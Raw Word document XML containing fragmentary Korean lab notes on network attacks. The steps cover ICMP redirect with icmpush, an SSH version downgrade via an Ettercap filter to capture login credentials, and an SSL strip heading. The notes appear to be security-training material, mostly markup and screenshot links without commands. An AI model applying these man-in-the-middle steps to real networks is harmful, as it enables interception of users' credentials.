            <wp:docPr id="71" name="그림 71" descr="https://lh6.googleusercontent.com/DsUvelmkbrggNzbHyBewAuqs3_jybz5NeUuUgmjJGWZxkA1uTQh5pScueA_ImEg3eFsD8QX_KT5U_zfHVDoWnONjpPVLpNOjTHH_kaV6qH6XX7gf7HsqWEe5_JcVvssXoTkjYo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6.googleusercontent.com/DsUvelmkbrggNzbHyBewAuqs3_jybz5NeUuUgmjJGWZxkA1uTQh5pScueA_ImEg3eFsD8QX_KT5U_zfHVDoWnONjpPVLpNOjTHH_kaV6qH6XX7gf7HsqWEe5_JcVvssXoTkjYoR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485900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="72" name="그림 72" descr="https://lh6.googleusercontent.com/Ml9Ci26N0DzDidFyyTD8WahjX6hv2ArUOOohzr_VgRIzXv_YaU7jCrnEx1Y5R9NyD_9Me2mWw7ByDdQ8M_SiHac9drRt1lx2-RY0yq6L_J41xoBQKq4EUIfNfeprQzK1zSd9BJ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Ml9Ci26N0DzDidFyyTD8WahjX6hv2ArUOOohzr_VgRIzXv_YaU7jCrnEx1Y5R9NyD_9Me2mWw7ByDdQ8M_SiHac9drRt1lx2-RY0yq6L_J41xoBQKq4EUIfNfeprQzK1zSd9BJG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T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>으로 가서 F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>orwarding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 하고 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">icmpush </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴을 사용해 공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000404FC" w:rsidRDefault="000404FC" w:rsidP="000404FC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54580" cy="1463040"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="73" name="그림 73" descr="https://lh3.googleusercontent.com/yNLqroOAI9Blbu-XcqLZoDmB1nPD567Rk1WZBSwH_9tTzzsoq5TOhhFcJOGFOSH5tohjkviaK4O2fo5J43e1jLJ4w_w_98_lO_Gymt42rVus9JmLH2gd7Ob5YRbH9Ynt8xpzND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3.googleusercontent.com/yNLqroOAI9Blbu-XcqLZoDmB1nPD567Rk1WZBSwH_9tTzzsoq5TOhhFcJOGFOSH5tohjkviaK4O2fo5J43e1jLJ4w_w_98_lO_Gymt42rVus9JmLH2gd7Ob5YRbH9Ynt8xpzNDTv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다시 공격대상의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>로 돌아와 R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>outing Table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 확인해보면 변동이 없는 것을 볼 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000404FC" w:rsidRDefault="000404FC" w:rsidP="000404FC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>방향 전환 요청이 켜져 있을 경우</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000404FC" w:rsidRDefault="000404FC" w:rsidP="000404FC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1240" cy="1432560"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="74" name="그림 74" descr="https://lh4.googleusercontent.com/v4zxhSbnaTuM8sMSjSxJirmrEL6Kk_MOQTU7ZqaT6pBtFKGOIKRDzslKmx1bCwaKNDp0oocdRiiipmrr6X1y_H2lxaKSboPc3tI9OgvO78WFG7Ze6Wq3IKKQ6QFgrL1THqCbTC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4.googleusercontent.com/v4zxhSbnaTuM8sMSjSxJirmrEL6Kk_MOQTU7ZqaT6pBtFKGOIKRDzslKmx1bCwaKNDp0oocdRiiipmrr6X1y_H2lxaKSboPc3tI9OgvO78WFG7Ze6Wq3IKKQ6QFgrL1THqCbTC2v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24100" cy="1424940"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="75" name="그림 75" descr="https://lh3.googleusercontent.com/yNLqroOAI9Blbu-XcqLZoDmB1nPD567Rk1WZBSwH_9tTzzsoq5TOhhFcJOGFOSH5tohjkviaK4O2fo5J43e1jLJ4w_w_98_lO_Gymt42rVus9JmLH2gd7Ob5YRbH9Ynt8xpzND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yNLqroOAI9Blbu-XcqLZoDmB1nPD567Rk1WZBSwH_9tTzzsoq5TOhhFcJOGFOSH5tohjkviaK4O2fo5J43e1jLJ4w_w_98_lO_Gymt42rVus9JmLH2gd7Ob5YRbH9Ynt8xpzNDTv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공격대상의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">로 가서 방화벽 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>설정에 방향 전환 요청에 체크가 되어 있는지 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000404FC" w:rsidRDefault="000404FC" w:rsidP="000404FC">
      <w:pPr>
        <w:ind w:left="80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86000" cy="1493520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="76" name="그림 76" descr="https://lh6.googleusercontent.com/DsUvelmkbrggNzbHyBewAuqs3_jybz5NeUuUgmjJGWZxkA1uTQh5pScueA_ImEg3eFsD8QX_KT5U_zfHVDoWnONjpPVLpNOjTHH_kaV6qH6XX7gf7HsqWEe5_JcVvssXoTkjYo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6.googleusercontent.com/DsUvelmkbrggNzbHyBewAuqs3_jybz5NeUuUgmjJGWZxkA1uTQh5pScueA_ImEg3eFsD8QX_KT5U_zfHVDoWnONjpPVLpNOjTHH_kaV6qH6XX7gf7HsqWEe5_JcVvssXoTkjYoR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4FC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63140" cy="1485900"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="77" name="그림 77" descr="https://lh6.googleusercontent.com/Ml9Ci26N0DzDidFyyTD8WahjX6hv2ArUOOohzr_VgRIzXv_YaU7jCrnEx1Y5R9NyD_9Me2mWw7ByDdQ8M_SiHac9drRt1lx2-RY0yq6L_J41xoBQKq4EUIfNfeprQzK1zSd9BJ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6.googleusercontent.com/Ml9Ci26N0DzDidFyyTD8WahjX6hv2ArUOOohzr_VgRIzXv_YaU7jCrnEx1Y5R9NyD_9Me2mWw7ByDdQ8M_SiHac9drRt1lx2-RY0yq6L_J41xoBQKq4EUIfNfeprQzK1zSd9BJG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T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>으로 가서 F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>orwarding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 하고 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">icmpush </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴을 사용해 공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000404FC" w:rsidRDefault="000404FC" w:rsidP="000404FC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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2293620" cy="1424940"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="78" name="그림 78" descr="https://lh6.googleusercontent.com/OdGMdT8U5j_H-2TSV9KQMUxqwc037LvSBP5zka1MsRhan8NBWayIrsFoA1ettts4Hh1H6FN_UvC9zEw9D0MUw3RkmlLgpqoY0UBz3hoFtl0z63BrMSf1SyqXKdRcGgdbR_IzUl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6.googleusercontent.com/OdGMdT8U5j_H-2TSV9KQMUxqwc037LvSBP5zka1MsRhan8NBWayIrsFoA1ettts4Hh1H6FN_UvC9zEw9D0MUw3RkmlLgpqoY0UBz3hoFtl0z63BrMSf1SyqXKdRcGgdbR_IzUl3A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4FC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301240" cy="1432560"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="79" name="그림 79" descr="https://lh4.googleusercontent.com/Fqb9vlCHJb6F4LiSFO5SZhxEIyPXssZRVKxfKb24wnlrg3YCPU4ZijUxIy_fwkWWyTZd8DM6PvsQDDMMJEEHeFZBVu4GBJLEcA93lj8-sfN_yyRIlu_1zfgkImhdvIE6J6CAe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4.googleusercontent.com/Fqb9vlCHJb6F4LiSFO5SZhxEIyPXssZRVKxfKb24wnlrg3YCPU4ZijUxIy_fwkWWyTZd8DM6PvsQDDMMJEEHeFZBVu4GBJLEcA93lj8-sfN_yyRIlu_1zfgkImhdvIE6J6CAepCT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C" w:rsidRPr="000404FC" w:rsidRDefault="000404FC" w:rsidP="000404FC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공격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뒤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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>outing Table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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했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때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내용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테이블에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추가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것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수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있음</w:t>
      </w:r>
      <w:r w:rsidR="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,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BT</w:t>
      </w:r>
      <w:r w:rsidR="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에서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Packet</w:t>
      </w:r>
      <w:r w:rsidR="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을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볼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수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있는지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확인하기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위해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 w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격대상</w:t>
      </w:r>
      <w:r w:rsidR="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC</w:t>
      </w:r>
      <w:r w:rsidR="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>로</w:t>
      </w:r>
      <w:r w:rsidR="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>외부에</w:t>
      </w:r>
      <w:r w:rsidR="00CF524B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ping test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000404FC" w:rsidRDefault="00CF524B" w:rsidP="000404FC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78380" cy="1341120"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="80" name="그림 80" descr="https://lh4.googleusercontent.com/i5bu6kPipwyEZQsU4uUK-0ziLvnxsJk3uRxCsAy9p3jEnN0mNXKOh76r4NmYFbrDXnS4GcOaUvyCmVfhDLz4lwRcOc5WGeMWtKLUE3bmwa7iIZOMYvK41IFx9X8rgN2dHd7Et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i5bu6kPipwyEZQsU4uUK-0ziLvnxsJk3uRxCsAy9p3jEnN0mNXKOh76r4NmYFbrDXnS4GcOaUvyCmVfhDLz4lwRcOc5WGeMWtKLUE3bmwa7iIZOMYvK41IFx9X8rgN2dHd7Etdm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93620" cy="1325880"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="81" name="그림 81" descr="https://lh5.googleusercontent.com/ECnMVCjZ1yT5-slySAkW5C7pvceGOXP0slF-07sFvRMo04CLDbckGQjX4_Jk2A4sFV9bBQECgQqDiiNH1G-WVRO06PRunUkdAexsnGcKPkGcVD5vsJWPLjtsRoxoLgYDbECfrs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ECnMVCjZ1yT5-slySAkW5C7pvceGOXP0slF-07sFvRMo04CLDbckGQjX4_Jk2A4sFV9bBQECgQqDiiNH1G-WVRO06PRunUkdAexsnGcKPkGcVD5vsJWPLjtsRoxoLgYDbECfrs9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BT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>으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했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때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Forwarding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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되는지</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ire Shark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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했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때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P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>acket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>들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잡히는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</w:p>
    <w:p w:rsidR="00CF524B" w:rsidRPr="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1164"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000404FC" w:rsidRPr="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="000404FC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CF524B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SH </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF524B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>취약점</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524B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303020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="82" name="그림 82" descr="https://lh4.googleusercontent.com/c22sNTr_cCgkjQaHQWa4EBrx_uu88zgOi7ODeFYITLb4sXrpPpmqJVHFBMWpVNPRFX1pAoLywjm04HXyQKv_Q3NOd0Px70_xmcb3L-CoQNUDmiVt8bOxWNSxjpMd6srt_mteBV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4.googleusercontent.com/c22sNTr_cCgkjQaHQWa4EBrx_uu88zgOi7ODeFYITLb4sXrpPpmqJVHFBMWpVNPRFX1pAoLywjm04HXyQKv_Q3NOd0Px70_xmcb3L-CoQNUDmiVt8bOxWNSxjpMd6srt_mteBVjJ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13" cy="13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287780"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="83" name="그림 83" descr="https://lh4.googleusercontent.com/dFNKgWutywzPiU8iSaI03-rxhRRQ_Jfi1EoosZdnNAky01rk4UdZC_94retn0QmFnu5puD5hSbkTKgREZ3IRvrRfE-gIQVC4lWxCejHAlP8-qzLG9zYNado0f-Vgi-2Bu8kjXnj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4.googleusercontent.com/dFNKgWutywzPiU8iSaI03-rxhRRQ_Jfi1EoosZdnNAky01rk4UdZC_94retn0QmFnu5puD5hSbkTKgREZ3IRvrRfE-gIQVC4lWxCejHAlP8-qzLG9zYNado0f-Vgi-2Bu8kjXnj-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97" cy="12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 xml:space="preserve">SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>버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협상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버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정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변경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하기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한</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파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생성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524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308860" cy="1402080"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="84" name="그림 84" descr="https://lh5.googleusercontent.com/DvrcL77bN4-B5r7S1OqybDCAsLOM3VIuTV5ItJbYyf9OfpJ8kzJSJn0gfPqvydjSlwtBte805VGB7_IfyqnfwSZPnTby3OoT_tLiL3Sni7oHmikpdU2XGaKi1LeTgIUma6Z3dT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5.googleusercontent.com/DvrcL77bN4-B5r7S1OqybDCAsLOM3VIuTV5ItJbYyf9OfpJ8kzJSJn0gfPqvydjSlwtBte805VGB7_IfyqnfwSZPnTby3OoT_tLiL3Sni7oHmikpdU2XGaKi1LeTgIUma6Z3dTL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 xml:space="preserve">Ettercap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴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만든</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> etter.filter.ssh.co </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>필터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파일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이용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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524B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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1493520" cy="1539240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="85" name="그림 85" descr="https://lh6.googleusercontent.com/bxBh1L7bd28mlbiv9y7jHCDb0dozeOf0AvZonYQgcysFZgdLMNaPkD6eU6zPO1fRl4hb6FSnUoD1nZwI9jpjyhHHVadlXzG6ruJcWU17Ho0dZGAZ9ULDrz_hmWx2l40MFrASpW6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6.googleusercontent.com/bxBh1L7bd28mlbiv9y7jHCDb0dozeOf0AvZonYQgcysFZgdLMNaPkD6eU6zPO1fRl4hb6FSnUoD1nZwI9jpjyhHHVadlXzG6ruJcWU17Ho0dZGAZ9ULDrz_hmWx2l40MFrASpW6p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1699260" cy="1539240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="86" name="그림 86" descr="https://lh4.googleusercontent.com/rxa3uQh8mpa6lteN-ksynsZlF9efCM33BAdtIimUV-BcpjatRMn8HnpTxTA6CuAa7JCWQx-lwhTHXyKKQLqpgHcwOFfB57xe8AakQ7J-OoEaI4FsNHY8NtEtSQwMRuh6D_zdCA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4.googleusercontent.com/rxa3uQh8mpa6lteN-ksynsZlF9efCM33BAdtIimUV-BcpjatRMn8HnpTxTA6CuAa7JCWQx-lwhTHXyKKQLqpgHcwOFfB57xe8AakQ7J-OoEaI4FsNHY8NtEtSQwMRuh6D_zdCAq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1737360" cy="1546860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="87" name="그림 87" descr="https://lh6.googleusercontent.com/QGzadvsIWEPStnIIQCNxQ3aECCCARjf31o2C0utPxbwHTUnYN8tcrNU4HxlzWlznseChtH3I1ZLHqzEec1miJeo7EWaR2jQUwU_xNnZaNGWTHw6qAeIjeUryfX2LtY6olfDp0y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6.googleusercontent.com/QGzadvsIWEPStnIIQCNxQ3aECCCARjf31o2C0utPxbwHTUnYN8tcrNU4HxlzWlznseChtH3I1ZLHqzEec1miJeo7EWaR2jQUwU_xNnZaNGWTHw6qAeIjeUryfX2LtY6olfDp0y_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공격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DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버로</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>접속</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524B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186940" cy="1356360"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="106" name="그림 106" descr="https://lh4.googleusercontent.com/yhCfNrkyhIQhYU0IDP0KpR2QCGZplBllF2aTb3pbyZuJ1WOmIlR6qvSp8bT29EsAlVHs59wEtkEBpBg1mXdyDdcD1UHkC6hQl8BkuvQd62YzV-QAFUGzduIbeQZ-M3iT-kA-X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lh4.googleusercontent.com/yhCfNrkyhIQhYU0IDP0KpR2QCGZplBllF2aTb3pbyZuJ1WOmIlR6qvSp8bT29EsAlVHs59wEtkEBpBg1mXdyDdcD1UHkC6hQl8BkuvQd62YzV-QAFUGzduIbeQZ-M3iT-kA-XN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86000" cy="1348740"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="107" name="그림 107" descr="https://lh3.googleusercontent.com/RIlC0BUhDq8X9-OYF1yF1u9tz3YkB71Jb1VhzKtvgnbGO0qEd1uK8-12ytqgIp_S78GqzAfTXn8kvoiTjmw7m9LkBvIUp8-BeCTUqpfe8rT723zSHvL7kCfXsJUV7ktTAdjYNF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lh3.googleusercontent.com/RIlC0BUhDq8X9-OYF1yF1u9tz3YkB71Jb1VhzKtvgnbGO0qEd1uK8-12ytqgIp_S78GqzAfTXn8kvoiTjmw7m9LkBvIUp8-BeCTUqpfe8rT723zSHvL7kCfXsJUV7ktTAdjYNFz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BT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해보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버전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다운그레이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했다는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것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수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있</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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경영기획부</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에서</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>서버로</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>접속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사용했던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아이디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비밀번호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가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524B">
      <w:pPr>
        <w:ind w:left="804"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CF524B" w:rsidRPr="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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 w:val="22"/>
        </w:rPr>
        <w:t>SSL Strip Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF524B" w:rsidRDefault="00CF524B" w:rsidP="00CF524B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186940" cy="1493520"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
